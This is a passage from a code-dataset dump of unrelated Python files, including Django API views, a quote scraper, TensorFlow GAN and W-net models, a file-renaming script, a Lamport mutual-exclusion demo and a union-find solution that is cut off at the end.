Request\"})\n@api_view(['GET'])\ndef copy_message_link(request, message_id):\n \"\"\"\n This is used to retrieve a single message. It takes a message_id as query params.\n If message_id is provided, it returns a dictionary with information about the message,\n or a 204 status code if there is no message with the same message id.\n I will use the message information returned to generate a link which contains a room_id and a message_id\n \"\"\"\n if request.method == 'GET':\n message = DB.read(\"dm_messages\", {\"id\": message_id})\n room_id = message['room_id']\n message_info = {\n \"room_id\": room_id,\n \"message_id\": message_id,\n \"link\": f\"https://dm.zuri.chat/getmessage/{room_id}/{message_id}\"\n }\n return Response(data=message_info, status=status.HTTP_200_OK)\n else:\n return JsonResponse({'message': 'The message does not exist'}, status=status.HTTP_404_NOT_FOUND)\n\n\n@api_view(['GET'])\ndef read_message_link(request, room_id, message_id):\n \"\"\"\n This is used to retrieve a single message. It takes a message_id as query params.\n If message_id is provided, it returns a dictionary with information about the message,\n or a 204 status code if there is no message with the same message id.\n I will use the message information returned to generate a link which contains a room_id and a message_id\n \"\"\"\n\n if request.method == 'GET':\n message = DB.read(\"dm_messages\", {\"id\": message_id, \"room_id\": room_id})\n return Response(data=message, status=status.HTTP_200_OK)\n else:\n return JsonResponse({'message': 'The message does not exist'}, status=status.HTTP_404_NOT_FOUND)\n \n\n@api_view([\"GET\"])\ndef get_links(request, room_id):\n \"\"\"\n Search messages in a room and return all links found\n \"\"\"\n url_pattern = r\"^(?:ht|f)tp[s]?://(?:www.)?.*$\"\n regex = re.compile(url_pattern)\n matches = []\n messages = DB.read(\n \"dm_messages\", filter={\"room_id\": room_id})\n if messages is not None:\n for message in messages:\n for word in message.get(\"message\").split(\" \"):\n match = regex.match(word)\n if match:\n matches.append(\n {\"link\": str(word), \"timestamp\": message.get(\"created_at\")})\n data = {\n \"links\": matches,\n \"room_id\": room_id\n }\n return Response(data=data, status=status.HTTP_200_OK)\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n\n@api_view([\"POST\"])\ndef save_bookmark(request, room_id):\n \"\"\"\n save a link as bookmark in a room\n \"\"\"\n try:\n serializer = BookmarkSerializer(data=request.data)\n room = DB.read(\"dm_rooms\", {\"id\": room_id})\n bookmarks = room[\"bookmarks\"] or []\n except Exception as e:\n print(e)\n return Response(status=status.HTTP_503_SERVICE_UNAVAILABLE)\n if serializer.is_valid() and bookmarks is not None:\n bookmarks.append(serializer.data)\n data = {\"bookmarks\": bookmarks}\n response = DB.update(\"dm_rooms\", room_id, data=data)\n if response.get(\"status\") == 200:\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET'])\ndef organization_members(request):\n \"\"\"\n This endpoint returns a list of members for an organization.\n :returns: json response -> a list of objects (members) or 401_Unauthorized messages.\n \"\"\"\n url = f\"https://api.zuri.chat/organizations/{ORG_ID}/members\"\n\n response = requests.get(url)\n \n if response.status_code == 200:\n response = response.json()['data']\n return Response(response, status = status.HTTP_200_OK)\n return Response(response.json(), status = status.HTTP_401_UNAUTHORIZED)\n\n\n@api_view([\"GET\"])\ndef retrieve_bookmarks(request, room_id):\n \"\"\"\n Retrieves all saved bookmarks in the room\n \"\"\"\n try:\n room = DB.read(\"dm_rooms\", {\"id\": room_id})\n bookmarks = room[\"bookmarks\"] or []\n except Exception as e:\n print(e)\n return Response(status=status.HTTP_503_SERVICE_UNAVAILABLE)\n if bookmarks is not None:\n serializer = BookmarkSerializer(data=bookmarks, many=True)\n if serializer.is_valid():\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n return Response(status=status.HTTP_404_NOT_FOUND)\n","sub_path":"backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"135959070","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import DetailView\nfrom emails.models import Email\nfrom feedback.models import Feedback\nimport email_utils\n\n\n@login_required\ndef sync_emails(request):\n email_utils.init_get_emails()\n return redirect('/')\n\n\nclass EmailDetail(DetailView):\n model = Email\n\n\n@login_required\ndef convert_to_feedback(request, e_id):\n email = get_object_or_404(Email, pk=e_id)\n if email.subject not in ('', None):\n title = email.subject\n else:\n title = email.body[:20]\n\n new = Feedback(title=title, description=email.body, method='email')\n new.save()\n email.feedback = new\n email.save()\n return redirect('edit_feedback', f_id=new.id)\n\n\n@login_required\ndef delete_email(request, e_id):\n if request.is_ajax() and request.method == 'POST':\n email = get_object_or_404(Email, pk=e_id)\n email.delete()\n response_data = {'result': 'Email has been deleted'}\n return JsonResponse(response_data)\n\n elif request.method == 'POST':\n email = get_object_or_404(Email, pk=e_id)\n email.delete()\n return redirect('index')\n","sub_path":"emails/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"396445076","text":"import re\nimport json\nfrom bs4 import BeautifulSoup\nfrom selenium_driver import driver\nfrom scroll import scroll\n\n\ndef get_quotes(url):\n try:\n # implicitly_wait tells the driver to wait before throwing an exception\n driver.implicitly_wait(30)\n # driver.get(url) opens the page\n driver.get(url)\n # This starts the scrolling by passing the driver and a timeout\n scroll(driver, 5)\n # Once scroll returns bs4 parsers the page_source\n soup = BeautifulSoup(driver.page_source, \"lxml\")\n # Them we close the driver as soup_a is storing the page source\n driver.close()\n\n # Empty array to store the links\n quotes = []\n\n regex_quotes = re.compile('^b-qt')\n regex_authors = re.compile('^bq-aut')\n\n quotes_list = soup.find_all('a', attrs={'class': regex_quotes})\n authors_list = soup.find_all('a', attrs={'class': regex_authors})\n\n quotes = []\n zipped_quotes = list(zip(quotes_list, authors_list))\n for i, x in enumerate(zipped_quotes):\n quote = x[0]\n author = x[1]\n quotes.append({\n \"id\": f\"id-{i}\",\n \"quote\": quote.get_text(),\n \"author\": author.get_text(),\n \"author-link\": author.get('href')\n })\n\n with open(\"quotes.json\", 'w') as json_file:\n json.dump(quotes, json_file)\n except Exception as e:\n print(e, '>>>>>>>>>>>>>>>Exception>>>>>>>>>>>>>>')\n\n\nget_quotes('https://www.brainyquote.com/topics/excellence-quotes')\n","sub_path":"scrapping-tool/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"406509015","text":"even=[]\r\nodd=[]\r\nlist1=[0,1,2,3,4,5,6,7,8,9,10]\r\nprint (\"org=\",list1)\r\n#rev\r\nlist1.sort(reverse=True)\r\nprint(\"rev=\",list1)\r\n#odd no\r\nprint(\"odd nos\")\r\nfor i in list1:\r\n if i%2!=0:\r\n print(i)\r\n#real no\r\nprint(\"real nos\") \r\nfor i in list1:\r\n if i!=0:\r\n print(i)\r\n#odd index value\r\nfor i in list1:\r\n if i % 2: \r\n even.append(list1[i]) \r\n else : \r\n odd.append(list1[i]) \r\nprint(odd)\r\n\r\n","sub_path":"odd_even_list.py","file_name":"odd_even_list.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"425059842","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport tensorflow as tf\nimport tflearn\n\nfrom tflearn.layers.core import input_data, dropout, fully_connected \nfrom tflearn.layers.conv import conv_2d,conv_2d_transpose, max_pool_2d\nfrom tflearn.layers.normalization import batch_normalization \nfrom tflearn.layers.estimator import regression\n\nfrom . import ResBlock_LRelu\n\n# The number of samples per batch.\nBATCH_SIZE = 1\n\n# The height of each i-vector.\nIVEC_HEIGHT = 1\n\n# The length of each i-vector.\nIVEC_DIM = 600\n\n# The number of color channels per image.\nIVEC_CHANNELS = 1\n\nPOOL_SIZE = 50\n\ndef get_outputs(inputs, network=\"tensorflow\"):\n ivec_a = inputs['ivec_a']\n ivec_b = inputs['ivec_b']\n\n fake_pool_a = inputs['fake_a']\n fake_pool_b = inputs['fake_b']\n\n with tf.variable_scope(\"Model\") as scope:\n\n if network == \"tensorflow\":\n current_discriminator = build_discriminator_tfl\n current_generator = build_generator_tfl\n else:\n raise ValueError(\n 'network must be tensorflow'\n )\n\n prob_real_a_is_real = current_discriminator(ivec_a, \"d_A\")\n prob_real_b_is_real = current_discriminator(ivec_b, \"d_B\")\n\n fake_ivec_b = current_generator(ivec_a, name=\"g_A\")\n fake_ivec_a = current_generator(ivec_b, name=\"g_B\")\n #print ('ivec_b: ', ivec_b)\n #print ('fake_ivec_a: ', fake_ivec_a)\n\n scope.reuse_variables()\n\n prob_fake_a_is_real = current_discriminator(fake_ivec_a, \"d_A\")\n prob_fake_b_is_real = current_discriminator(fake_ivec_b, \"d_B\")\n\n # \"cycle_ivec_a\" means: A -> Fake_B -> \"Fake_A\"\n cycle_ivec_a = current_generator(fake_ivec_b, name=\"g_B\")\n cycle_ivec_b = current_generator(fake_ivec_a, name=\"g_A\")\n\n scope.reuse_variables()\n\n prob_fake_pool_a_is_real = current_discriminator(fake_pool_a, \"d_A\")\n prob_fake_pool_b_is_real = current_discriminator(fake_pool_b, \"d_B\")\n\n return {\n 'prob_real_a_is_real': prob_real_a_is_real,\n 'prob_real_b_is_real': prob_real_b_is_real,\n 'prob_fake_a_is_real': prob_fake_a_is_real,\n 'prob_fake_b_is_real': prob_fake_b_is_real,\n 'prob_fake_pool_a_is_real': prob_fake_pool_a_is_real,\n 'prob_fake_pool_b_is_real': prob_fake_pool_b_is_real,\n 'cycle_ivec_a': cycle_ivec_a,\n 'cycle_ivec_b': cycle_ivec_b,\n 'fake_ivec_a': fake_ivec_a,\n 'fake_ivec_b': fake_ivec_b,\n }\n\n\ndef build_generator_tfl(inputgen, name=\"generator\"):\n with tf.variable_scope(name):\n # downsampling\n inputgen = tf.reshape(inputgen, [1, 1, IVEC_DIM, 1])\n # conv layer 1\n g_cnn = conv_2d(inputgen, 32, [1, 3], strides=1, weights_init='xavier', bias_init='xavier')\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n # conv layer 2\n g_cnn = conv_2d(g_cnn, 64, [1, 3], strides=[1, 2], weights_init='xavier', bias_init='xavier')\n g_cnn = batch_normalization(g_cnn)\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n # conv layer 3\n g_cnn = conv_2d(g_cnn, 128, [1, 3], strides=[1, 2], weights_init='xavier', bias_init='xavier')\n g_cnn = batch_normalization(g_cnn)\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n\n # res_net with 6 blocks\n # modified to use Leaky Relu activation, alpha=0.2\n g_cnn = ResBlock_LRelu.residual_block_LRelu(g_cnn, 6, 128)\n\n # upsampling\n # deconv layer 1\n g_cnn = conv_2d_transpose(g_cnn, 64, [1, 3], output_shape=[1, 300, 64], strides=[1, 2], weights_init='xavier', bias_init='xavier')\n g_cnn = batch_normalization(g_cnn)\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n # deconv layer 2\n g_cnn = conv_2d_transpose(g_cnn, 32, [1, 3], output_shape=[1, 600, 32], strides=[1, 2], weights_init='xavier', bias_init='xavier')\n g_cnn = batch_normalization(g_cnn)\n g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n\n #output layer\n g_cnn = conv_2d(g_cnn, 1, [1, 3], strides=1, weights_init='xavier', bias_init='xavier')\n g_cnn = tf.reshape(g_cnn, [1, IVEC_DIM])\n \n return g_cnn\n\n\ndef build_discriminator_tfl(inputdisc, name=\"discriminator\"):\n with tf.variable_scope(name, reuse=tf.AUTO_REUSE):\n inputdisc = tf.reshape(inputdisc, [1, 1, IVEC_DIM, 1])\n # conv layer 1\n d_cnn = conv_2d(inputdisc, 64, [1, 3], strides=1, weights_init='xavier', bias_init='xavier')\n #d_cnn = batch_normalization(d_cnn)\n d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n # conv layer 2\n d_cnn = conv_2d(d_cnn, 128, [1, 3], strides=[1, 2], weights_init='xavier', bias_init='xavier')\n #d_cnn = batch_normalization(d_cnn)\n d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n # fully connected layer 1\n d_cnn = fully_connected(d_cnn, 512)\n d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n # fully connected layer 1\n d_cnn = fully_connected(d_cnn, 512)\n d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n #output layer\n #d_cnn = fully_connected(d_cnn, 1, activation='sigmoid')\n d_cnn = fully_connected(d_cnn, 1)\n \n return d_cnn\n","sub_path":"model_my_cnn.py","file_name":"model_my_cnn.py","file_ext":"py","file_size_in_byte":5294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"255152567","text":"from django.shortcuts import render\nfrom .models import Material,TestPaper,Choice,Question, Exam\nfrom .serializers import MaterialSerializer,TestPaperSerializer,ChoiceSerializer,QuestionSerializer, ExamSerializer\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom django.http import Http404\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\nfrom inClass.models import StudentExam\nfrom interaction.models import UserProfile\nimport os\nfrom django.conf import settings\n\n# Create your views here.\n\n\nclass MateriaOperation(APIView):\n\n def get(self, request, format=None):\n mlist = Material.objects.all().order_by(\"-upload_date\")\n serializer = MaterialSerializer(mlist, many=True,context={'request':request})\n return Response(serializer.data)\n\n\nclass ExamOperation(APIView):\n\n def get(self, request, format=None):\n elist = Exam.objects.all().order_by(\"-startTime\")\n serializer = ExamSerializer(elist, many=True,context={'request':request})\n return Response(serializer.data)\n\n def post(self, request, format=None):\n result = []\n print(request.POST)\n userid = int(request.POST['userid'])\n # exam = Exam.objects.all()[1]\n # print(exam.e_stuexam.all()[0].student_id)\n # print(exam.e_stuexam.filter(student=3) is None)\n # print(len(exam.e_stuexam.filter(student=userid)))\n exams = Exam.objects.all()\n for exam in exams:\n if len(exam.e_stuexam.filter(student=userid)) == 0:\n s_data = ExamSerializer(exam)\n result.append(s_data.data)\n return Response(result, status=status.HTTP_200_OK)\n\n\nclass getPaperList(APIView):\n\n def get(self,request,format =None):\n paperlist = TestPaper.objects.filter(status=True).order_by(\"-create_time\")\n serializer = TestPaperSerializer(paperlist,many=True)\n return Response(serializer.data)\n\n\ndef get_questions(pk):\n try:\n return TestPaper.objects.get(pk = pk).questions\n except TestPaper.DoesNotExist:\n raise Http404\n\n\n@csrf_exempt\n@api_view(['POST'])\ndef getQuestion(request):\n pk = request.POST['paperid']\n print(pk)\n questions = get_questions(pk)\n serializer = QuestionSerializer(questions, many=True)\n return Response(serializer.data,status=status.HTTP_200_OK)\n\n\ndef get_choices(pk):\n try:\n return Choice.objects.filter(question_id=pk)\n except Choice.DoesNotExist:\n raise Http404\n\n\n@csrf_exempt\n@api_view(['POST'])\ndef getChoice(request):\n question_pk = request.POST['questionid']\n choices = get_choices(question_pk)\n serializer = ChoiceSerializer(choices, many=True)\n return Response(serializer.data,status=status.HTTP_200_OK)\n\n\n@csrf_exempt\n@api_view(['POST'])\ndef submitExam(request):\n # print(request.POST)\n print(request.FILES)\n file = request.FILES.get('file')\n userid = int(request.POST['userid'])\n examid = int(request.POST['index'])\n student = UserProfile.objects.get(id=userid)\n exam = Exam.objects.get(id=examid)\n # print(student.username)\n # print(type(student.username))\n # print(exam.topic)\n # print(type(exam.topic))\n # print(file.name)\n stu_exam = StudentExam()\n if file:\n stu_exam.slice = os.path.join(student.username, exam.topic, file.name)\n fpath = os.path.join(settings.MEDIA_ROOT, student.username, exam.topic)\n fname = os.path.join(settings.MEDIA_ROOT, student.username, exam.topic, file.name)\n if os.path.exists(fpath) is False:\n os.makedirs(fpath)\n with open(fname, 'wb') as f:\n for c in file.chunks():\n f.write(c)\n stu_exam.student = student\n stu_exam.exam = exam\n stu_exam.save()\n # print(student)\n # print(exam)\n\n return Response(status=status.HTTP_200_OK)\n","sub_path":"inClass/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"420743289","text":"# encoding:utf-8\n##\n# 实现批量修改文件夹下说有文件的名称,循环所有的文件夹\n# \n##\nimport os\nimport sys\n\n#fs=os.listdir(pf)\n# 修改文件名\ndef rename_file(pf):\n for (pf,dirs,files) in os.walk(pf):\n for old in files:\n #print filename\n old=old.strip()\n tem=old.replace('[','〔')\n new=tem.replace(']','〕')\n try:\n os.rename(pf+'/'+old,pf+'/'+new)\n print (old + ' ---> ' + new)\n except Exception as e:\n print(e)\n return\n\n#修改文件夹名称\ndef rename_dir(pf):\n for parent, dirnames, filenames in os.walk(pf, topdown=False):\n for dirname in dirnames:\n pathdir = os.path.join(parent, dirname)\n new_pathdir = os.path.join(parent, dirname.replace('[','〔').replace(']','〕'))\n if pathdir == new_pathdir: #如果文件夹名本身就是全小写\n continue\n print(pathdir + ' ---> ' + new_pathdir)\n os.rename(pathdir, new_pathdir)\n return\n \nif __name__==\"__main__\":\n pf=sys.argv[1]\n #print (pf)\n rename_dir(pf)\n rename_dir(pf)\n","sub_path":"util/osrn.py","file_name":"osrn.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"604776361","text":"\n\n#---------------------------------Lamport's Fast mutual exclusion algorithm------------------------------------------#\n\nimport threading\nimport time\nimport logging\nimport random\n# global variables\nx = 0\ny = -1\ntotalRequests = 0\nThreads = []\nrunningThreads = []\nB = [0]*100\n\n# using the logging module from python's library which basically formats the output to be displayed on the console\nlogging.basicConfig(level=logging.DEBUG, format='[%(threadName)s, %(asctime)s, %(message)s]', datefmt = '%Y-%m-%d %H:%M:%S')\n\nclass Fast(threading.Thread):\n \n # the constructor which assigns the requests, threadname, index to the respective thread\n def __init__(self, string, i, z):\n \n self.threadName = string+str(i)\n self.index = i\n self.requests = z\n threading.Thread.__init__(self, name=self.threadName)\n \n #invoked after the thread.start()\n def run(self):\n logging.debug('is started ... ')\n \n # calling a global function which handles the number of requests of each thread, decrements its value by 1 after entering and exiting a CS once.\n requestManager(self)\n \n \ndef requestManager(self):\n \n # total requests as entered by the user i.e. sys.argv[2]\n global totalRequests\n # keep doing until all the requests of all the threads have been satisfied \n while totalRequests > 0:\n #if all the requests are satisfied - do nothing\n if self.requests == 0:\n pass\n # else do this\n else: \n contend(self)\n totalRequests-=1\n \n# a global function which contains the logic of the lamport's fast mutual exclusion algorithm \ndef contend(self):\n\n global y\n global x\n \n logging.debug('requesting CS')\n \n B[self.index] = 1\n x = self.index\n logging.debug('...')\n if y != -1:\n logging.debug('...')\n B[self.index] = 0\n while(not( y == -1)):\n logging.debug(\"...\")\n contend(self)\n y = self.index\n logging.debug('...')\n if x != self.index:\n logging.debug('...')\n B[self.index] = 0\n for each in Threads:\n while(not( B[each.index] == 0)):\n logging.debug(\"...\")\n if y != self.index:\n logging.debug('...')\n while(not( y == -1)):\n logging.debug(\"...\")\n contend(self)\n cs()\n logging.debug('Exiting CS')\n y = -1\n B[self.index] = 0\n #make the thread sleep for a good 3 seconds! lucky one gets to sleep more!\n time.sleep(3)\n \n \n#global cs function \ndef cs():\n logging.debug('Entering CS')\n\n# method which calls the constructor of the Fast class and invokes the threads \ndef spawnThreads(assign):\n \n i = 0\n global totalRequests\n \n for z in assign:\n totalRequests+=z\n Threads.append(Fast(\"THREAD\", i, z))\n i+=1\n \n for each in Threads:\n if each.requests > 0:\n runningThreads.append(each)\n each.start()\n # wait until all the threads are done with their requests, then exit \n for each in runningThreads:\n each.join()\n \n \n \n \n","sub_path":"Fast.py","file_name":"Fast.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"319216371","text":"# coding: utf-8\n\"\"\"\nConfig of deviding dataset for training and testing.\n\n data_dir: The filename of raw data.\n label_dir: The filename of corresponding label.\n train_dir: The train result save file.\n num_classes: Categroies.\n bands: Nums of bands of pixel.\n conv1_kernel: Kernels of convolution layer 1.\n learning_rate: Learning rate of training.\n\"\"\"\n\nroot = '/media/luo/result/hsi/'\nresult_root = '/media/luo/result/hsi_transfer/'\n\nksc = {\n 'data_dir': root + 'KSC/KSCData.mat',\n 'label_dir': root + 'KSC/KSCGt.mat',\n 'train_dir': result_root + 'ksc/',\n 'num_classes': 13,\n 'bands': 176,\n 'rectangle_size_train':[112, 269, 270, 403],\n 'rectangle_size_test':[305, 443, 434, 545],\n 'conv1_kernel': [10, 10, 10, 10, 10, 27, 27, 27, 27, 27, 21, 21, 21, 21, 21, 12, 12, 12, 12, 12],\n 'learning_rate': 0.1,\n}\n\nip = {\n 'data_dir': root + 'IP/IPdata.mat',\n 'label_dir': root + 'IP/IPGt.mat',\n 'train_dir': result_root + 'ip/',\n 'num_classes': 16,\n 'bands': 200,\n 'rectangle_size_train':[],\n 'rectangle_size_test':[],\n 'conv1_kernel': [11, 11, 11, 11, 11, 15, 15, 15, 15, 15, 13, 13, 13, 13, 13, 14, 14, 14, 14, 14],\n 'learning_rate': 0.1,\n}\n\npu = {\n 'data_dir': root + 'PU/PUData.mat',\n 'label_dir': root + 'PU/PUGt.mat',\n 'train_dir': result_root + 'pu/',\n 'num_classes': 9,\n 'bands': 103,\n 'rectangle_size_train':[],\n 'rectangle_size_test':[],\n 'conv1_kernel': [15, 15, 15, 15, 15, 12, 12, 12, 12, 12, 20, 20, 20, 20, 20, 35, 35, 35, 35, 35],\n 'learning_rate': 0.1,\n}\n\nsa = {\n 'data_dir': root + 'SA/SAData.mat',\n 'label_dir': root + 'SA/SAGt.mat',\n 'train_dir': result_root + 'sa/',\n 'num_classes': 16,\n 'bands': 204,\n 'rectangle_size_train':[],\n 'rectangle_size_test':[],\n 'conv1_kernel': [13, 13, 13, 13, 13, 15, 15, 15, 15, 15, 24, 24, 24, 24, 24, 19, 19, 19, 19, 19],\n 'learning_rate': 0.1,\n}","sub_path":"tf_try/DO_TF/HSI-PPR-TF/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"419957764","text":"import keras.layers\nimport keras.models\nimport tensorflow as tf\nfrom keras.layers import Conv2D, MaxPooling2D, UpSampling2D, BatchNormalization, Reshape, Permute, Activation, Input, \\\n add, multiply\nfrom keras.layers import concatenate, core, Dropout\nfrom keras.models import Model\nfrom keras.layers.merge import concatenate\nfrom keras.optimizers import Adam\nfrom keras.optimizers import SGD\nfrom keras.layers.core import Lambda\nimport keras.backend as K\n# import tensorflow.keras.layers\n# import tensorflow.keras.models\n# import tensorflow as tf\n# from tensorflow.keras.layers import Conv2D, MaxPooling2D, UpSampling2D, BatchNormalization, Reshape, Permute, Activation, Input, \\\n# add, multiply\n# from tensorflow.keras.layers import concatenate, core, Dropout\n# from tensorflow.keras.models import Model\n# from tensorflow.keras.layers.merge import concatenate\n# from tensorflow.keras.optimizers import Adam\n# from tensorflow.keras.optimizers import SGD\n# from tensorflow.keras.layers.core import Lambda\n# import tensorflow.keras.backend as K\n\nCONST_DO_RATE = 0.5\n\noption_dict_conv = {\"activation\": \"relu\", \"padding\": \"same\"}\noption_dict_bn = {\"momentum\" : 0.9}\n\ndef attention_up_and_concate(down_layer, layer, data_format='channels_last'):\n if data_format == 'channels_first':\n in_channel = down_layer.get_shape().as_list()[1]\n else:\n in_channel = down_layer.get_shape().as_list()[3]\n up = UpSampling2D(data_format=data_format)(down_layer)\n\n layer = attention_block_2d(x=layer, g=up, inter_channel=in_channel // 4, data_format=data_format)\n\n if data_format == 'channels_first':\n my_concat = Lambda(lambda x: K.concatenate([x[0], x[1]], axis=1))\n else:\n my_concat = Lambda(lambda x: K.concatenate([x[0], x[1]], axis=3))\n\n concate = my_concat([up, layer])\n return concate\n\n\ndef attention_block_2d(x, g, inter_channel, data_format='channels_last'):\n\n theta_x = Conv2D(inter_channel, [1, 1], strides=[1, 1], data_format=data_format)(x)\n\n phi_g = Conv2D(inter_channel, [1, 1], strides=[1, 1], data_format=data_format)(g)\n\n f = Activation('relu')(add([theta_x, phi_g]))\n\n psi_f = Conv2D(1, [1, 1], strides=[1, 1], data_format=data_format)(f)\n rate = Activation('sigmoid')(psi_f)\n att_x = multiply([x, rate])\n\n return att_x\n\ndef attention_3d_block_and_concate(down_layer):\n a_probs = tf.keras.layers.Dense(down_layer.get_shape().as_list()[3], activation='softmax')(down_layer)\n output_attention_mul = tf.keras.layers.multiply([down_layer, a_probs])\n return tf.keras.layers.concatenate([down_layer, output_attention_mul], axis=3)\n\n\n\n# attention-enhanced simplified W-net\ndef get_core(dim1, dim2):\n \n x = tf.keras.layers.Input(shape=(dim1, dim2, 1))\n\n # DOWN 1\n a = tf.keras.layers.Convolution2D(64, 3, **option_dict_conv)(x) \n a = tf.keras.layers.BatchNormalization(**option_dict_bn)(a)\n\n a = tf.keras.layers.Convolution2D(64, 3, **option_dict_conv)(a)\n a = tf.keras.layers.BatchNormalization(**option_dict_bn)(a)\n\n y = tf.keras.layers.MaxPooling2D()(a)\n\n b = tf.keras.layers.Convolution2D(128, 3, **option_dict_conv)(y)\n b = tf.keras.layers.BatchNormalization(**option_dict_bn)(b)\n\n b = tf.keras.layers.Convolution2D(128, 3, **option_dict_conv)(b)\n b = tf.keras.layers.BatchNormalization(**option_dict_bn)(b)\n\n y = tf.keras.layers.MaxPooling2D()(b)\n\n c = tf.keras.layers.Convolution2D(256, 3, **option_dict_conv)(y)\n c = tf.keras.layers.BatchNormalization(**option_dict_bn)(c)\n\n c = tf.keras.layers.Convolution2D(256, 3, **option_dict_conv)(c)\n c = tf.keras.layers.BatchNormalization(**option_dict_bn)(c)\n \n # UP 1\n \n c = tf.keras.layers.UpSampling2D()(c)\n z = attention_3d_block_and_concate(c)\n \n y = tf.keras.layers.concatenate([b, c, z], axis=3)\n\n d = tf.keras.layers.Convolution2D(128, 3, **option_dict_conv)(y)\n d = tf.keras.layers.BatchNormalization(**option_dict_bn)(d)\n\n d = tf.keras.layers.Convolution2D(128, 3, **option_dict_conv)(d)\n d = tf.keras.layers.BatchNormalization(**option_dict_bn)(d)\n\n # DOWN 2\n c1 = tf.keras.layers.MaxPooling2D()(c)\n d1 = tf.keras.layers.MaxPooling2D()(d)\n y = tf.keras.layers.concatenate([c1, d1], axis=3)\n\n e = tf.keras.layers.Convolution2D(256, 3, **option_dict_conv)(y)\n e = tf.keras.layers.BatchNormalization(**option_dict_bn)(e)\n\n e = tf.keras.layers.Convolution2D(256, 3, **option_dict_conv)(e)\n e = tf.keras.layers.BatchNormalization(**option_dict_bn)(e)\n\n # UP 2\n e = tf.keras.layers.UpSampling2D()(e)\n z = attention_3d_block_and_concate(e)\n y = tf.keras.layers.concatenate([d, e, z], axis=3)\n\n f = tf.keras.layers.Convolution2D(128, 3, **option_dict_conv)(y)\n f = tf.keras.layers.BatchNormalization(**option_dict_bn)(f)\n\n f = tf.keras.layers.Convolution2D(128, 3, **option_dict_conv)(f)\n f = tf.keras.layers.BatchNormalization(**option_dict_bn)(f)\n\n f = tf.keras.layers.UpSampling2D()(f)\n z = attention_3d_block_and_concate(f)\n \n y = tf.keras.layers.concatenate([a, f, z], axis=3)\n\n y = tf.keras.layers.Convolution2D(64, 3, **option_dict_conv)(y)\n y = tf.keras.layers.BatchNormalization(**option_dict_bn)(y)\n\n y = tf.keras.layers.Convolution2D(64, 3, **option_dict_conv)(y)\n y = tf.keras.layers.BatchNormalization(**option_dict_bn)(y)\n\n return [x, y]\n\n\ndef get_model_3_class(dim1, dim2, activation=\"softmax\"):\n \n [x, y] = get_core(dim1, dim2)\n\n y = tf.keras.layers.Convolution2D(3, 1, **option_dict_conv)(y)\n\n if activation is not None:\n y = tf.keras.layers.Activation(activation)(y)\n\n model = tf.keras.models.Model(x, y)\n \n return model\n\n\n","sub_path":"utils/fixed_att_SWnet_v3.py","file_name":"fixed_att_SWnet_v3.py","file_ext":"py","file_size_in_byte":5662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"182826685","text":"\"\"\"\n805. Maximum Association Set\nhttps://www.lintcode.com/problem/maximum-association-set/description\n\nExample 1:\n\tInput: ListA = [\"abc\",\"abc\",\"abc\"], ListB = [\"bcd\",\"acd\",\"def\"]\n\tOutput: [\"abc\",\"acd\",\"bcd\",\"def\"]\n\tExplanation:\n\tabc is associated with bcd, acd, dfe, so the largest set is the set of all books\n\neasier method. build list of children after wards.\n\"\"\"\nclass Solution:\n \"\"\"\n @param ListA: The relation between ListB's books\n @param ListB: The relation between ListA's books\n @return: The answer\n \"\"\"\n def maximumAssociationSet(self, ListA, ListB):\n # Write your code here\n n = len(ListA)\n if len(ListB) != n:\n return -1\n\n self.father = {}\n\n for i in range(n):\n if ListA[i] not in self.father:\n self.father[ListA[i]] = ListA[i]\n if ListB[i] not in self.father:\n self.father[ListB[i]] = ListB[i]\n self.union(ListA[i], ListB[i])\n\n children = {} #root_father and a set of its children\n for key in self.father:\n root_id = self.find(key)\n children[root_id] = children.get(root_id, set())\n children[root_id].add(key)\n\n max_set = set()\n for root_father, child_list in children.items():\n if len(child_list) > len(max_set):\n max_set = child_list\n return list(max_set)\n\n\n\n def union(self, a, b):\n a_father = self.find(a)\n b_father = self.find(b)\n if a_father == b_father:\n return\n\n self.father[a_father] = b_father\n\n def find(self, x):\n if self.father[x] 